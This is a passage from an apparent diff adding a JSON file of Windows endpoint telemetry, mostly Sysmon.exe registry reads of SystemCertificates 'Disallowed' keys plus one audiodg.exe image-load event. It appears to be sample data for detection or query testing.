"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976520000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976520000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": 
"C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "WMALFXGFXDSP.dll", + "image_path": "C:\\Windows\\System32\\WMALFXGFXDSP.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976520000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 
131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573976820000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573976820000, + "unique_pid": 